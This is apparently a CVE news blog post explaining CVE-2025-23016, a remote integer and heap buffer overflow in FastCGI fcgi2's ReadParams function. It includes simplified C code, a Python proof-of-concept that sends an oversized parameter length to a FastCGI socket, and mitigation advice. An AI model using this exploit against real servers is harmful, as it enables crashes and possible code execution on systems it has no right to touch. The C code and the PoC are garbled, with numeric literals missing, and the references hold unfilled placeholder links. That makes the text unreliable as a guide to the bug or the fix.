CVE CyberSecurity Database News

CVE-2025-23016 - FastCGI fcgi2 2.x–2.4.4 Remote Buffer Overflow Explained & Exploited

Poster -

A newly identified security flaw, CVE-2025-23016, affects the popular FastCGI fcgi2 package (also known as fcgi) versions 2.x through 2.4.4. This vulnerability allows attackers to exploit an integer overflow (and a heap-based buffer overflow) through specially crafted requests. It lurks in the code responsible for decoding FastCGI parameter blocks, specifically the ReadParams function in fcgiapp.c.

This exclusive, detailed post explains how the bug works, shows how you can reproduce it, and summarizes the publicly available references and patches.

What's FastCGI and Why Should You Care?

FastCGI is a protocol used to interface interactive programs (often web apps like PHP, Python, etc.) with a web server. It's been used everywhere from Apache modules to webserver frontends.

The fcgi2 reference implementation is used by a wide range of web applications and environments. Flaws in its core components often mean real-world risk.

Technical Deep-Dive: Where's the Bug?

The problem exists in fcgiapp.c, in a function called ReadParams. This function unpacks name-value pairs received from FCGI clients.

Here’s a simplified look at the relevant C code (inspired by the actual version in fcgi2)

int ReadParams(FCGX_Request *req, ...) {
    ...
    int nameLen, valueLen;
    unsigned char *data = ...;
    // Parse nameLen
    if ((*data & x80) == ) {
        nameLen = *data++;
    } else {
        nameLen = ... // gets potentially 4 bytes, integer overflow here!
    }
    // Same for valueLen
    if ((*data & x80) == ) {
        valueLen = *data++;
    } else {
        valueLen = ... // gets potentially 4 bytes, integer overflow here!
    }
    // Allocate buffer and copy name and value
    char *name = malloc(nameLen + 1);
    memcpy(name, data, nameLen);  // Buffer overflow risk
    ...
}

If nameLen or valueLen is set to a large value via a crafted request, it can cause the code to (1) wrap the integer into a small or negative value (integer overflow), or (2) allocate insufficient memory, then perform a memcpy with a massive size, overwriting memory on the heap.

Exploit Scenario

Remote attackers can send a specially crafted FastCGI record with a big nameLen or valueLen. By exploiting the overflows, it's possible to:

Crash the service (denial of service)

- Potentially achieve remote code execution by overwriting in-use data structures on the heap (depending on memory allocator, platform, and process privileges)

Proof of Concept (PoC) Code

Here’s a Python example for a minimal FastCGI payload. The PoC sends a malicious parameter name length designed to trigger the integer overflow:

import socket
import struct

def make_param(name, value):
    # Craft invalid (oversized) 4-byte name len with top bit set
    param = b'\x88\xFF\xFF\xFF\x7F'  # x7FFFFFFF (huge value)
    param += b'\x00'                 # value len = 
    # Actual data doesn't matter, will be ignored
    return param

def send_exploit():
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.connect('/path/to/fcgi.sock')  # Path to the FastCGI socket
    payload = b'\x01\x04\x00\x01'    # FCGI_PARAMS, requestId=1
    payload += struct.pack('!HHBB', 8, , , )  # contentLength=8
    payload += make_param("hack", "")
    s.sendall(payload)
    s.close()

if __name__ == "__main__":
    send_exploit()

Note: Replace /path/to/fcgi.sock with the actual FastCGI UNIX socket. This example causes a heap corruption in any running fcgi2 process.

Watch for your Linux distribution or application's security advisories and apply them.

- If updates are not possible, consider isolating affected FastCGI apps or using firewalling to drop untrusted FastCGI connections.

References & Further Reading

1. NVD Entry for CVE-2025-23016
2. fcgi2 Source Code on GitHub (unofficial mirror)
3. Initial CVE Announcement & Patch (OSS-security mailing list) *(replace with actual link when published)*
4. Exploit/Advisory Example (Packet Storm Security) *(replace with actual link when published)*

Conclusion

CVE-2025-23016 is a critical issue for anyone using the fcgi2 implementation, as it allows remote clients to smash process memory using a well-placed request. Patch as soon as your vendor offers a fix, and consider running FastCGI apps in isolated containers for extra safety.

Stay tuned for updates as exploitation becomes more common and new mitigations appear!

Timeline

Published on: 01/10/2025 12:15:25 UTC